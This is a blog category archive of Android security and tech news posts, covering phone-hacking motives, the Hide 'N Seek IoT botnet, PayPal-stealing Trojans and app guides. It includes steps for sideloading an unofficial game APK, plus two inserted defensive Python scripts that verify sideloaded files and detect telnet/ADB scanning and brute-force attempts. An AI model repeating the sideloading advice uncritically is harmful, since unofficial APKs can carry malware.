Category Archives: Android

All the reasons why cybercriminals want to hack your phone

When people think of hacking, most imagine desktop computers, laptops, or perhaps even security cameras. However, in recent years, cybercriminals have expanded their repertoire to include smartphones, too. Here are 10 reasons why they may be looking to hack your phone.

1. To infect it with malware

Many smartphone users assume they can stay safe from malware and other threats by installing antivirus apps on their phones and being extra careful about the websites they visit. They typically don’t expect their phones to have malware out of the box. However, researchers showed that’s what happened with more than three dozen Android models, typically from lesser-known brands.

The phones had Trojan malware installed on them before they reached users, and the culprit appeared to be a software vendor in Shanghai that was a shared reseller for a brand of antivirus software. Although it’s not clear what the hackers wanted to do after infecting the phones, the malware was particularly hard to remove. Often, it involved fully reinstalling the operating system.

2. To eavesdrop on calls

People use their phones to speak to loved ones, discuss business plans, talk about their travels—all manner of personal, intimate content. So, it’s not surprising that criminals would want to break in and listen, whether to case a target or simply for voyeuristic pleasure. But how do they do it?

There’s a flaw in the US cellular exchange, in the signaling protocol known as SS7, which allows hackers to listen to calls, read texts, and see users’ locations once they learn a target’s phone number. Even though US agencies know about the issue, they haven’t taken decisive action to fix it, leaving Americans’ phone privacy at risk.

3. To steal money

Ransomware attacks cause headaches for computer users by making the affected machines lock up or holding files hostage until people pay the ransom to restore access. Even then, paying doesn’t guarantee a return to proper functionality. Ransomware doesn’t only affect computers, though. There’s a recent trend of mobile ransomware, which often originates from malicious, third-party apps.

In one example, a third-party app promised to optimize the Android system but actually tricked people into transferring $1,000 from their PayPal accounts. The login process was legitimate, so it wasn’t a phishing attempt. However, once people logged in, a Trojan automated the PayPal transfer.

4. To blackmail people

The crime of blackmail isn’t new, but threat actors recognize that the small computer in people’s pockets and purses likely has more personal information stored in it than a desktop or laptop. And they are able to first cut people off from accessing their phones before then threatening to leak the information they find.

Criminals may start the hack after obtaining some of the victim’s personal information that is available on the black market due to a previous, unrelated breach. They then use that information to contact the victim’s phone company and pose as the user, saying that they want to transfer the number to a new phone. Phone companies often provide such services and can automatically transfer information, including phone numbers, to a new device. The trouble is that in this case, the old phone still works, but it’s useless to the person who owns it.

After hackers take over a phone in this way, the stage is set for more serious crimes—blackmail among them. If a person had essential numbers in their phone that were not backed up elsewhere, they could easily feel pressured to cave in to the hackers’ demands to avoid worse consequences.

5. To damage your phone

Hackers feel they’ve accomplished a goal by causing chaos for victims. One way to do that is to make the phone overheat and ultimately ruin it. Security researchers warned that hackers could break into a phone’s processor and use it for mining cryptocurrency. In addition to making the phone slow down, it can also cause the phone to get too hot or even blow up!

There are many reliable cooling devices used in cell phones for temperature management, even “intelligent” temperature management solutions that heat up your phone’s battery when it’s too cool and cool it down when it’s too hot. However, if hackers have their way, even those normally sufficient internal components could fail to keep the device cool enough.

One type of cryptomining malware, called Loapi, is often hidden in apps that appear as downloadable games. Security researchers ran a test and found it actually made a phone battery bulge due to excessive heat after only two days.

6. To threaten national security

Countless analysts have chimed in to say that President Trump’s alleged use of insecure mobile devices could help foreign adversaries glean information about the United States that could threaten the nation or at least give information about the president’s intended actions.

In 2018, Billy Long, a Republican congressman, had his mobile phone and Twitter account hacked. Cybercriminals know that one of the primary ways politicians interact with followers is through social media.

Besides threatening national security more directly, these hackers could erode the trust politicians have built with their audiences, especially with fake posts that seem to come from the genuine account owners.

Cybercriminals know that by hacking the mobile phones and social media accounts of politicians, they are contributing to the overall public opinion that politicians cannot be trusted. Instead of looking to the source for information, users might instead look for news via sources that are even less reliable or strategically crafted to spread fake news.

7. For fun or notoriety

Some hackers get a thrill by successfully pulling off their attacks. Hacking is a source of entertainment for them, as well as an ego boost. If money isn’t the primary motivator for cybercriminals, then notoriety might be a close second. Hackers may get into phones because it’s a newer challenge that might require more cutting-edge malware development techniques. Ultimately, many cybercriminals want approval from others in the industry and desire their respect.

8. To get payment information

E-wallets, which store payment information inside smartphone apps so people don’t have to carry real credit or debit cards, are convenient. However, their rising popularity has given hackers another reason to target phones.

Often, cybercriminals entice people to download fake mobile payment apps (of course believing they are real). Then, once people enter their payment information, hackers have the information needed to charge transactions to the cards.

9. Because so many people use it

Since hackers want their attacks to have significant payoffs, they know they can up their chances of having a major impact by targeting smartphones. Information published by the Pew Research Center shows 95 percent of Americans own smartphones. To put that in perspective, only 35 percent of the population did in 2011, when the organization first conducted a survey on smartphone ownership.

Also, different research from another organization reveals that mobile Internet usage is overtaking desktop time. People are becoming increasingly comfortable with using their smartphones to go online, browse, and even shop. As such, no matter what kind of hack cybercriminals orchestrate, they can find plenty of victims by focusing on smartphone users.

10. Because it’s an easy target

Research shows that mobile apps have rampant security problems. This gives criminals ample opportunity to infiltrate insecure apps rather than the phones themselves.

In one case, about 40 of the top 50 shopping apps had at least a few high-level security vulnerabilities that allowed hackers to see personal information or deceive users by luring them to dangerous apps that were copies of the originals.

Further research about problematic dating apps found that many of them give third parties access to unencrypted data through vulnerable software development kits (SDKs). Hackers know some apps achieve hundreds of thousands, or even millions, of downloads. If they can break into them, they’ll get fast access to the phones that have those apps installed and the people who use them.

How to stay protected

These examples show that hackers have a myriad of reasons to hack phones and even more ways to make it happen. One easy way to protect against attacks is to avoid third-party app stores and only download content from the phone’s legitimate app stores, such as Google Play or iTunes. However, threat actors can penetrate those platforms, too, and many an infected or rogue app has made its way through.

It’s also smart to keep tabs on phone statistics, such as battery life and the number of running apps. If those deviate too much from the norm, that’s a sign hackers may be up to no good in the background.

Running a mobile antivirus scan at least monthly, or installing an always-on cybersecurity program is another good strategy, but only if the application comes from a trustworthy source, such as the vendor’s official site.

Instead of being overeager to download new apps, people should ideally exercise caution and only do so if numerous sources of feedback indicate they are free from major security flaws. Some app development companies are in such a hurry to get to the market with their latest offerings that they do not make security a priority.

Besides these more specific tips, it’s essential for people to be highly aware of how they interact with their phones. For example, strange pop-ups or redirects in a phone’s browser, or random icons appearing without having downloaded a new app could indicate problems, and individuals should not assume that everything’s okay. When in doubt, it’s best to stop using the phone and get some answers—before hackers learn all they need to know about you.

The post All the reasons why cybercriminals want to hack your phone appeared first on Malwarebytes Labs.

Mobile Menace Monday: Is Fuchsia OS the end of Android?

It’s no secret that every year Google announces a new Android version. This time though, recent Google documents state that the next major Android version will be Android Q and not Android 9.1 Pie.

In parallel, Google is also developing an operating system called Fuchsia that’s supposedly going to replace Android in the near future. People were expecting to see a statement from Google about Fuchsia, or Andromeda (its previous codename), back in October 2017. But that never happened. Instead, we get to speculate for another year about whether or not it’s here to replace Android, or is simply a playground for developers. Here’s what we know so far.

A brief history of Google Fuchsia

Fuchsia is a capability-based operating system with user interface, and it has the ability to scale up to larger devices like laptops and computers. Also, it can support ARM, MIPS, and x86 processors.

It first popped up on GitHub in August 2016 with zero fanfare or explanation from Google. Unlike Android and Chrome OS, Google Fuchsia is not based on Linux, but rather Google’s own new microkernel.

In May 2017, an experimental OS leaked. However, calling it an “OS” might be a misnomer. Basically, its system UI was up and running on top of Android and functioning like an app, but nothing else worked. Later, one of the developers working on the project teased that this was not just a dumping ground but a real project. This led to speculation that Google had larger plans for it.

Not long after, at the beginning of 2018, Google released news that the Fuchsia team picked the Chrome OS-powered Google Pixelbook as a supported device. A couple of curious users rushed out to test this claim. They confirmed that they were able to run Fuchsia on these Google Pixelbooks. This was one more big step forward. Since then, we’ve heard nothing more. However, we do know the components of Fuchsia, and they look promising.

The Fuchsia layer cake

Let’s take a closer look under the hood of this potential future Google OS. There are four distinct layers that hold the whole operating system together. Google uses a layer cake model when describing the organization of Fuchsia code, and we will not deviate from this scheme. So, let’s talk about each layer separately and in detail.

Zircon

It all starts with Zircon (formerly Magenta), Fuchsia’s new microkernel, which is based on LK (Little Kernel), a small operating system intended for embedded devices. Zircon is the foundation on which the rest of Fuchsia is built, and it primarily handles access to hardware and communication between software.

Garnet

The next layer, which sits atop Zircon, is called Garnet. Garnet consists of services needed for the OS, such as its network and graphics, together with the package manager and device drivers. Some of them are worth mentioning here: Escher, a Vulkan-based graphics renderer with specific support for volumetric soft shadows; Amber, Fuchsia’s update system; and Xi Editor, a modern editor with a backend written in Rust.

Peridot

The next layer up, Peridot, mostly handles Fuchsia’s modular runtime app design for composition. What this means is that almost everything that exists in Fuchsia, such as software and even system files, is delivered in packages, and Fuchsia packages can be made up of smaller components instead of large, all-in-one programs. One of the major components of Peridot is Ledger. Ledger is a storage system for Fuchsia, and it provides and manages separate data stores for apps/components across devices, syncing everything through a cloud provider.

Topaz

Topaz is the top layer and the one you’ll most likely interact with. It’s similar to Android’s pre-installed (factory) applications like messaging, contacts, phone, camera, and music. The most important part is the introduction of Flutter support. Flutter is a software development kit allowing cross-platform development for Fuchsia, Android, and iOS. Flutter produces apps based on Dart, an open-source, scalable programming language with robust libraries and runtimes for building web, server, and mobile apps. Because the Flutter software development kit is cross-platform, users are able to install parts of Fuchsia on Android devices.

In addition, Google already announced Flutter 1.0 is out. The first stable release of Google’s UI toolkit for creating native experiences for iOS and Android from a single codebase is available at https://flutter.io.

Final thoughts

Let’s sum it up. Here’s what we know so far:

  • Google Fuchsia is a new OS in development from Google, but is still a ways off from completion.
  • The OS is based on the Zircon kernel, which makes it highly scalable and secure.
  • Flutter, a software development kit offering cross-platform opportunities, is already out.

Although Google said Fuchsia is just “one of many experimental open-source projects” at the company, we can already see a potential OS brewing that could replace Android. Microsoft once tried to create something similar with the code name Singularity, but they totally failed. That’s why there’s a big question mark if Fuchsia will actually replace Android and Chrome OS, or putter out like some of its predecessors.

Also, let’s remember that Android was hanging around for about five years before it launched in a real product. If Fuchsia follows a similar path, and everything goes well, maybe we can expect a consumer product sometime around 2020. Right now, it’s still a giant maybe. So if you’re feeling stressed about learning a new OS, there is still plenty of time to adjust—save the panicking for later in 2019.

The post Mobile Menace Monday: Is Fuchsia OS the end of Android? appeared first on Malwarebytes Labs.

A week in security (December 10 – 16)

Last week on Labs, we took a look at some new Mac malware, a collection of various scraped data dumps, the protection of power grids, and how bad actors are using SMB vulnerabilities. 

Other cybersecurity news

  • Millions affected by Facebook photo API bug: An issue granted third-party apps more access to photos than should normally be granted, including images uploaded but not published. (source: Facebook)
  • Bomb threats may be a hoax: An email in circulation urging ransom payments in Bitcoin lest bombs across the US be detonated may well be a fake, according to US law enforcement. (source: The Register)
  • Man jailed for fraud offenses: A man in the UK has been jailed for taking part in fraudulent activities. The main point of interest is surely the spectacular device he built. (source: Met Police)
  • Another Google Plus bug: For six days, developers were able to access profile data not made public by the users. (source: Google)
  • Windows 10 data collection: Reddit users complained Windows 10 is grabbing a certain kind of data even with the setting disabled. (source: How to Geek)
  • Taylor Swift concert tracks stalkers with facial recognition software: At a recent event, cutting-edge tech was deployed to ensure the crowds were free of potential troublemakers. (Source: Rolling Stone)
  • Password disasters of 2018: A tongue-in-cheek look at some of the more spectacular password mishaps seen rumbling into view this year. (Source: Help Net Security)
  • Android Trojan steals from PayPal accounts: Even with 2FA enabled, it might not be enough to keep your account balance safe. (Source: ESET)
  • Character recognition collects URLs in YouTube videos: Theoretically private data in hidden videos may not be as private as you’d first hoped. (Source: Austin Burk’s blog)
  • Traveller data left lying around on USB sticks: Border Agents aren’t being quite as careful as they should be where potentially sensitive passenger data is concerned. (Source: Naked Security)

Stay safe, everyone!

The post A week in security (December 10 – 16) appeared first on Malwarebytes Labs.

Call of Duty mobile Android beta launched~ Download Here

Call of Duty mobile Android beta version now available for download

In August this year, Activision, an American video game publisher, partnered with Tencent Games, the mobile publisher of the popular multiplayer online battle royale game PlayerUnknown’s Battlegrounds (PUBG), for a new Call of Duty mobile game for China.

After its initial success in China, Activision has now soft-launched Call of Duty: Legends of War, the newest first-person shooter game for mobile on Android for select regions, in collaboration with Tencent Games.

Apparently, Call of Duty: Legends of War is already available for download for users in Australia from the Google Play Store as a closed alpha.

According to the description, the new game “combines the best maps, characters, weapons and gear from the Call of Duty universe and brings them together for the first time.”

The game features multiplayer (with 4 game modes like Free4All, Search & Destroy, Team Deathmatch and Frontline) along with a zombie mode where you can fight against real players or bots.

Further, it includes classic maps such as Nuketown, Killhouse, Hijacked, Crossfire, Standoff, and Crash. Players can choose to don characters from the Call of Duty Universe like Price, Ghost, and others to participate in the game.

Just like in PUBG, players can customize characters and weapons by using the in-game currency which can be earned by playing through the game or by real-world currency.

The new game has a new Facebook page that showcases a trailer for Call of Duty: Legends of War, which combines an MP and Zombies experience.

How To Download Call Of Duty Mobile Beta Version-

Those who are interested in downloading Call of Duty: Legends of War before it is officially released around the globe can follow the steps below:

  1. Download Call of Duty: Legends of War 1.0.0 beta APK file.
  2. Install the APK file in your Android phone.
  3. Launch the game and exit it after the initial loading screen comes up.
  4. Download the additional OBB file on your phone (1.06 GB in size; it is advisable to use Wi-Fi or LAN to download this over 1GB file).
  5. Extract the OBB file to the location: /Android/obb/com.activision.callofduty.shooter and ensure that the OBB file is saved within com.activision.callofduty.shooter folder.
  6. That’s it! You are ready to enjoy the game.
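Steps 1, 2, 4 and 5 ask you to install an APK and an expansion file obtained outside Google Play, so a practitioner would first check both files. The script below is an added example, not TechWorm’s, Activision’s or Google’s code: it compares the APK’s SHA-256 against a digest the distributor publishes (here a constructed stand-in) and checks that the OBB file follows Android’s `main.<version-code>.<package>.obb` naming and sits in the `/Android/obb/<package>/` directory named in step 5. The package name comes from the article; the file bytes, digests and paths are constructed.

```python
"""Pre-install checks for a sideloaded APK and its OBB expansion file.

Added example; not code from the article, Activision or Google. The package
name is taken from the article's step 5; everything else is constructed.
"""
import hashlib
import hmac
import re
from pathlib import PurePosixPath

# Android's expansion-file naming convention: main.<version-code>.<package>.obb
# (or patch.<version-code>.<package>.obb).
OBB_NAME_RE = re.compile(
    r"^(?P<kind>main|patch)\.(?P<version>\d+)\.(?P<package>[A-Za-z][\w.]*)\.obb$"
)

PACKAGE = "com.activision.callofduty.shooter"   # from the article's step 5
OBB_ROOT = PurePosixPath("/Android/obb")

# Constructed stand-ins for the downloaded APK and a tampered copy of it.
APK_BYTES = b"PK\x03\x04" + b"constructed-apk-placeholder-bytes"
TAMPERED_APK_BYTES = APK_BYTES + b"\x00"

# Stands in for the SHA-256 a distributor would publish next to the download.
PUBLISHED_SHA256 = hashlib.sha256(APK_BYTES).hexdigest()


def sha256_hex(data: bytes) -> str:
    """SHA-256 of the file contents as lowercase hex."""
    return hashlib.sha256(data).hexdigest()


def verify_digest(data: bytes, expected_hex: str) -> bool:
    """True only if the file's digest matches the published one (constant-time compare)."""
    return hmac.compare_digest(sha256_hex(data), expected_hex.strip().lower())


def expected_obb_dir(package: str) -> PurePosixPath:
    """Directory Android's expansion-file mechanism reads for this package."""
    return OBB_ROOT / package


def check_obb_placement(path: str, package: str) -> list:
    """Return a list of problems; an empty list means the OBB is named and placed correctly."""
    p = PurePosixPath(path)
    problems = []
    m = OBB_NAME_RE.match(p.name)
    if not m:
        problems.append(f"file name {p.name!r} does not follow main.<version>.<package>.obb")
    elif m.group("package") != package:
        problems.append(f"file name is for package {m.group('package')!r}, expected {package!r}")
    if p.parent != expected_obb_dir(package):
        problems.append(f"directory {str(p.parent)!r} is not {str(expected_obb_dir(package))!r}")
    return problems


if __name__ == "__main__":
    print("APK digest ok:", verify_digest(APK_BYTES, PUBLISHED_SHA256))
    print("tampered APK ok:", verify_digest(TAMPERED_APK_BYTES, PUBLISHED_SHA256))
    good = f"/Android/obb/{PACKAGE}/main.1.{PACKAGE}.obb"
    bad = f"/Download/main.1.{PACKAGE}.obb"
    print("good placement problems:", check_obb_placement(good, PACKAGE))
    print("bad placement problems:", check_obb_placement(bad, PACKAGE))
```

If the digest check fails, the APK is not the file the distributor published and should not be installed; if the placement check reports problems, the game will not find its expansion data even though the APK installs cleanly.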

However, please note that since the game is currently in the alpha stage, the chances of bugs affecting your gameplay are very high.

The post Call of Duty mobile Android beta launched~ Download Here appeared first on TechWorm.

Hide ‘N Seek Botnet Continues to Grow by Infecting IoT Devices Using Default Credentials

Avast security analysts reported that the Hide ‘N Seek botnet continues to grow by infecting vulnerable Internet of Things (IoT) devices still using their default passwords.

According to Avast, the Hide ‘N Seek botnet comes with two main functionalities. The first capability involves the use of a scanner borrowed from Mirai malware to reach random IP addresses of IoT devices and abuse well-known exploits. If this doesn’t work, the scanner attempts to brute-force access to an IoT device using a hard-coded list of default passwords.

For its second functionality, the IoT botnet uses a peer-to-peer (P2P) protocol to share information about new peers, exfiltrate files from an infected device and distribute new binaries, including some for a Monero cryptocurrency miner. Avast’s researchers believe the Monero miner was just a test and that the attackers’ true intentions are still unknown.

A Busy Year for Hide ‘N Seek

Bitdefender researchers were the first to spot the Hide ‘N Seek botnet in January 2018. A few months later, Bitdefender reported the threat had added code that abused two new vulnerabilities affecting Internet Protocol television (IPTV) camera models to scan for a larger pool of vulnerable devices and to achieve persistence on an infected IoT product.

More improvements followed in July, when 360 Netlab observed additional exploits and a then-inactive mining program. Two months later, Bitdefender discovered yet another update when Hide ‘N Seek gained the ability to exploit the Android Debug Bridge (ADB) over Wi-Fi feature in Android devices.

The botnet’s evolution is of particular concern given the overall growth in IoT threats. In just the first half of 2018, Kaspersky Lab detected 121,588 IoT malware samples — three times as many as were uncovered in all of 2017.

How to Defend Your Organization Against IoT Botnets

Security professionals can help defend against IoT botnets by changing all default passwords on their organization’s devices. In addition, security teams should build an incident response team that can oversee software patches and disclose any breaches.
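Changing default passwords removes the botnet’s easiest way in, but a security team also wants to notice when the scanner described above is hitting its network. The script below is an added example, not Avast’s, Bitdefender’s or 360 Netlab’s code: it reads syslog-style firewall lines and flags the two traits the article attributes to Hide ‘N Seek’s Mirai-derived scanner, one source touching many distinct devices on telnet (23, 2323) and ADB over Wi-Fi (5555) ports, and repeated authentication failures from one source against one device. The log line format, the thresholds and every address are constructed assumptions.

```python
"""Flag IoT-scanner and default-credential brute-force traffic in firewall logs.

Added example; not code from Avast, Bitdefender, 360 Netlab or the botnet.
Log format, thresholds and addresses are constructed for the demonstration.
"""
import re
from collections import Counter, defaultdict

# Ports the article associates with the scanner: telnet (Mirai-style
# default-credential attempts) and Android Debug Bridge over Wi-Fi.
WATCHED_PORTS = {23, 2323, 5555}

# Constructed syslog-style firewall line; the field layout is an assumption.
LINE_RE = re.compile(
    r"^(?P<ts>\S+) fw: (?P<action>ACCEPT|DROP) SRC=(?P<src>[\d.]+) "
    r"DST=(?P<dst>[\d.]+) DPT=(?P<dpt>\d+)(?: AUTH=(?P<auth>FAIL|OK))?$"
)

# Constructed sample: 198.51.100.7 sweeps six devices on watched ports and
# fails telnet login four times on one of them; 192.0.2.2 is a legitimate
# admin on SSH; 203.0.113.9 touches only two devices; one line is noise.
SAMPLE_LOG = """\
2018-12-10T01:00:01Z fw: ACCEPT SRC=198.51.100.7 DST=192.0.2.10 DPT=23 AUTH=FAIL
2018-12-10T01:00:02Z fw: ACCEPT SRC=198.51.100.7 DST=192.0.2.10 DPT=23 AUTH=FAIL
2018-12-10T01:00:03Z fw: ACCEPT SRC=198.51.100.7 DST=192.0.2.10 DPT=23 AUTH=FAIL
2018-12-10T01:00:04Z fw: ACCEPT SRC=198.51.100.7 DST=192.0.2.10 DPT=23 AUTH=FAIL
2018-12-10T01:00:05Z fw: DROP SRC=198.51.100.7 DST=192.0.2.11 DPT=23
2018-12-10T01:00:06Z fw: DROP SRC=198.51.100.7 DST=192.0.2.12 DPT=2323
2018-12-10T01:00:07Z fw: DROP SRC=198.51.100.7 DST=192.0.2.13 DPT=23
2018-12-10T01:00:08Z fw: ACCEPT SRC=198.51.100.7 DST=192.0.2.14 DPT=5555
2018-12-10T01:00:09Z fw: DROP SRC=198.51.100.7 DST=192.0.2.15 DPT=5555
2018-12-10T01:00:10Z fw: ACCEPT SRC=192.0.2.2 DST=192.0.2.10 DPT=22 AUTH=FAIL
2018-12-10T01:00:11Z fw: ACCEPT SRC=192.0.2.2 DST=192.0.2.10 DPT=22 AUTH=OK
2018-12-10T01:00:12Z fw: ACCEPT SRC=192.0.2.2 DST=192.0.2.10 DPT=22 AUTH=OK
2018-12-10T01:00:13Z fw: DROP SRC=203.0.113.9 DST=192.0.2.20 DPT=5555
2018-12-10T01:00:14Z fw: DROP SRC=203.0.113.9 DST=192.0.2.21 DPT=5555
2018-12-10T01:00:15Z fw: noise line that does not parse
"""


def parse(lines):
    """Yield one event dict per well-formed line; malformed lines are skipped."""
    for raw in lines:
        m = LINE_RE.match(raw.strip())
        if not m:
            continue
        ev = m.groupdict()
        ev["dpt"] = int(ev["dpt"])
        yield ev


def find_scanners(lines, min_targets=5):
    """Sources that touched at least min_targets distinct hosts on watched ports."""
    targets = defaultdict(set)
    for ev in parse(lines):
        if ev["dpt"] in WATCHED_PORTS:
            targets[ev["src"]].add(ev["dst"])
    return {src: len(dsts) for src, dsts in targets.items() if len(dsts) >= min_targets}


def find_bruteforce(lines, min_failures=3):
    """(src, dst, port) triples with at least min_failures authentication failures."""
    failures = Counter()
    for ev in parse(lines):
        if ev["auth"] == "FAIL":
            failures[(ev["src"], ev["dst"], ev["dpt"])] += 1
    return {key: n for key, n in failures.items() if n >= min_failures}


if __name__ == "__main__":
    lines = SAMPLE_LOG.splitlines()
    for src, n in find_scanners(lines).items():
        print(f"scanner candidate {src}: {n} distinct devices on telnet/ADB ports")
    for (src, dst, port), n in find_bruteforce(lines).items():
        print(f"brute-force candidate {src} -> {dst}:{port}: {n} failed logins")
```

The two checks are deliberately separate: a sweep across many devices shows up before any login succeeds, while repeated failures against one device catch the default-password list being tried; a device that still has its factory credentials would show the sweep but no failures, which is exactly why the password change comes first.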

Sources: Avast, Bitdefender, Bitdefender (1), 360 Netlab, Bitdefender(2), Kaspersky Lab

The post Hide ‘N Seek Botnet Continues to Grow by Infecting IoT Devices Using Default Credentials appeared first on Security Intelligence.

3 New Ways To Take A ScreenShot On Android Smartphones

Android is possibly the most popular Smartphone OS with more than 2 billion monthly active devices.

There might be times when you are looking for how to take a screenshot on an Android smartphone.

Here in this article, we are providing you with the easiest ways to take a screenshot on Android devices.

A screenshot is an image taken of whatever’s on your screen. The process of taking screenshots on Android smartphones might sound obvious to many users but still, it’s good to learn some new stuff.

So these are the three best ways to capture and share a screenshot on Android smartphones.



Here is how to take a screenshot on an Android smartphone.

The Standard Way To Take Screenshot On Android

The most basic way to capture a screenshot on Android smartphones is by pressing the volume down and power button at the same time. This will instantly capture a screenshot of whatever’s on your screen.

A screenshot captured by using the above-mentioned process is generally verified by a screenshot capture sound, screen flash, or a notification.


Screenshot Using Gestures

The next best way to capture screenshots on Android is by using third-party applications. These Screenshot applications eliminate the need of pressing physical buttons to capture a screenshot.

Furthermore, using screenshot capturing applications you can even use gestures to capture screenshots. Third-party screenshot capturing applications also offer photo editing tools.

You can find an extensive collection of applications to capture screenshots on the Play Store.


Scrolling Screenshots In Android

A typical screenshot only captures what’s on your screen, but if you want to share a web page or a long chat conversation, then a scrolling (long) screenshot might help you.

Many Android OEMs like OnePlus have introduced scrolling screenshots. That said, if your smartphone’s custom skin doesn’t support this feature you can download an application called LongShot to capture scrolling screenshots.

Longshot has a very well-developed and easy to navigate UI. Furthermore, capturing scrolling screenshots using Longshot is pretty much self-explanatory.

DOWNLOAD LongShot


So these were three basic ways to capture and easily share screenshots on Android smartphones.

The post 3 New Ways To Take A ScreenShot On Android Smartphones appeared first on TechWorm.

Android Malware Steals from PayPal Accounts

What happens when you combine a remotely controlled banking Trojan with an abuse of Android Accessibility services? According to new research from ESET, you get an Android Trojan that steals money from

The post Android Malware Steals from PayPal Accounts appeared first on The Cyber Security Place.

10 Best Free Skype Alternatives For Windows/Android/iOS

Since its advent in 2003, Skype has become an industry standard when it comes to video calling on Windows PC. In addition to video calls, Skype is also a full-fledged messaging and voice calling application that is available for smartphones as well.

Even after its immense popularity, Skype is still not the most feature-rich and secure video calling application.

So these are some of the best alternatives to Skype that will definitely enhance your video calling experience.


Best Free Skype Alternatives


WhatsApp

The first Skype alternative for PC that you are probably already using is WhatsApp. This immensely popular messaging application also doubles up as a reliable video-calling application. WhatsApp is available for both smartphones and computers.

A majority of your friends and family members are already using WhatsApp, which eliminates the need for signing up for new services.

WhatsApp now supports group video calls, using which you can communicate with up to four friends at once. Overall WhatsApp is a reliable Skype alternative.

DOWNLOAD WhatsApp


Google Hangouts

Google Hangouts is another popular video calling service that is mainly used by various organizations to interact with co-workers. Similar to WhatsApp Google Hangouts is also available for smartphones and computers.

Using Google Hangouts you can hold a video call with up to 25 participants. So as to invite and connect with different users you only need their email address or phone number.

During calls, Google Hangouts offers impressive audio and video quality and the connection is secure as well.

DOWNLOAD Google Hangouts


LINE

The next feature-rich Skype alternative is LINE. This alternative to Skype has a very well-developed UI, and its cross-platform support offers a seamless messaging experience.

Similar to other Skype alternatives on the list, LINE can also be used for video calls, voice calls, and text messaging. Nifty features like Keep, Animated Stickers, LINE Today, Face Play, Stories, and Live help LINE to stand out from the crowd.

Lastly, using LINE you can also share all sorts of media and document files with your contacts.

DOWNLOAD LINE


Facebook Messenger

The next best Skype alternative that you are possibly already using is Facebook Messenger. Using Messenger you can communicate with any of your Facebook friends and the quality of video calls is impressive as well.

In addition to video calls, Messenger also allows users to have voice calls with their friends. Messenger is available as a full-fledged application for Windows, iOS, Android, and MacOS.

DOWNLOAD Facebook Messenger


Tox

Tox is one of the most secure Skype alternatives and has gained popularity in recent years. If security and privacy are your major concern, then Tox is the best Skype alternative for you. Since Tox is open-source, it is completely advertisement-free.

Similar to other Skype alternatives, Tox also offers messaging, file sharing, and voice calling features.

Using the Screen Sharing feature you can even share your desktop with your friends. Lastly, Tox is available for both Windows and MacOS.

DOWNLOAD TOX


WeChat

The next smartphone oriented Skype alternative is WeChat. Similar to other Skype alternatives WeChat offers voice calls, text messaging, video calls and group chats.

As mentioned earlier, WeChat is a smartphone-oriented application, but it’s still available for Windows and MacOS in their respective app stores. It is worth noting that a smartphone is required for logging in to the WeChat Web version.

WeChat allows a maximum of four participants in a group video call. To sum it all, WeChat is a reliable Skype alternative that simply gets the job done.

DOWNLOAD WeChat


ooVoo

The next capable Skype alternative on the list is ooVoo. This instant messaging application offers a great messaging experience and supports emoji, stickers, and GIFs. ooVoo supports HD video calling with up to 8 people simultaneously.

The SuperClear technology helps ooVoo to optimize the quality of video calls based on your internet speed. ooVoo is available for Android, iOS, Windows, and MacOS.

This feature-rich Skype alternative also doubles up as a reliable file transfer tool.

DOWNLOAD ooVoo


Viber

Viber is another impressive Skype alternative for secure video calls and messaging. Unlike other Skype alternatives, Viber allows users to play built-in games and interact with popular websites when nobody is around to chat at the moment.

If you’re worried about privacy and security, then end-to-end encryption on Viber will definitely impress you. Viber even allows users to delete seen messages. In addition to Windows, Viber is also available for MacOS and Linux.

Viber is one among very few instant messaging applications that allow users to customize the application’s theme and overall UI based on their preferences.

DOWNLOAD Viber


Wire

If security and privacy are on top of your priority list, then Wire will definitely impress you. Wire is an ideal Skype alternative for business or organization-based communication needs. This application offers end-to-end encrypted audio conference calls with up to 10 people.

In addition to messaging and video calls, Wire also doubles up as a secure file and screen sharing tool. Since Wire is an open-source application, it’s completely ad-free and there are no in-app purchases.

Overall, Wire is a professional alternative to Skype that is used by many big companies.

DOWNLOAD Wire


Riot

The last Skype alternative on the list is Riot. Nifty features like voice and video conferencing, file sharing, notifications, and project reminders definitely help Riot to stand out from the crowd.

Riot can be used in any web browser, and it’s available for smartphones and computers as well. Chats and calls on Riot are also end-to-end encrypted.

Overall Riot is a reliable Skype alternative that simply gets the job done.

DOWNLOAD Riot


CONCLUSION

So these were some of the best Skype alternatives that are more secure and feature-rich as compared to Skype. Do share your favorite Skype alternatives in the comments section below.

The post 10 Best Free Skype Alternatives For Windows/Android/iOS appeared first on TechWorm.

In a Test, 3D Model of a Head Was Able To Fool Facial Recognition System of Several Popular Android Smartphones

Forbes magazine tested four of the most popular handsets running Google's operating systems and Apple's iPhone to see how easy it'd be to break into them with a 3D-printed head. All of the Android handsets opened with the fake. Apple's phone, however, was impenetrable. From the report: For our tests, we used my own real-life head to register for facial recognition across five phones. An iPhone X and four Android devices: an LG G7 Linq, a Samsung S9, a Samsung Note 8 and a OnePlus 6. I then held up my fake head to the devices to see if the device would unlock. For all four Android phones, the spoof face was able to open the phone, though with differing degrees of ease. The iPhone X was the only one to never be fooled. There were some disparities between the Android devices' security against the hack. For instance, when first turning on a brand new G7 Linq, LG actually warns the user against turning facial recognition on at all. No surprise then that, on initial testing, the 3D-printed head opened it straightaway. [...] The OnePlus 6 came with neither the warnings of the other Android phones nor the choice of slower but more secure recognition.

Read more of this story at Slashdot.

Nasty Android malware found stealing its victims’ PayPal funds

By Waqas

Another day, another Android malware – This time, according to the latest findings of ESET’s IT security researchers, there is a new malware in Google Play Store that hijacks PayPal account to steal money – Researchers assessed that the malware is specifically targeting Android users and steals no less than $1,000. The malware was first […]

This is a post from HackRead.com Read the original post: Nasty Android malware found stealing its victims’ PayPal funds

Android Trojan steals money from victims’ PayPal account

ESET researchers have unearthed a new Android Trojan that tricks users into logging into PayPal, then takes over and mimics the user’s clicks to send money to the attacker’s PayPal address. The heist won’t go unnoticed by the victim if they are looking at the phone screen, but they will also be unable to do anything to stop the transaction from being executed as it all happens in a matter of seconds. The only thing … More

The post Android Trojan steals money from victims’ PayPal account appeared first on Help Net Security.

November 2018: Most wanted malware exposed

Check Point has published its latest Global Threat Index for November 2018. The index reveals that the Emotet botnet has entered the Index’s top 10 ranking after researchers saw it spread through several campaigns, including a Thanksgiving-themed campaign. This involved sending malspam emails in the guise of Thanksgiving cards, containing email subjects such as happy “Thanksgiving day wishes”, “Thanksgiving wishes” and “the Thanksgiving day congratulation!” These emails contained malicious attachments, often with file names related … More

The post November 2018: Most wanted malware exposed appeared first on Help Net Security.

Google’s CEO Thinks Android Users Know How Much Their Phones Are Tracking Them

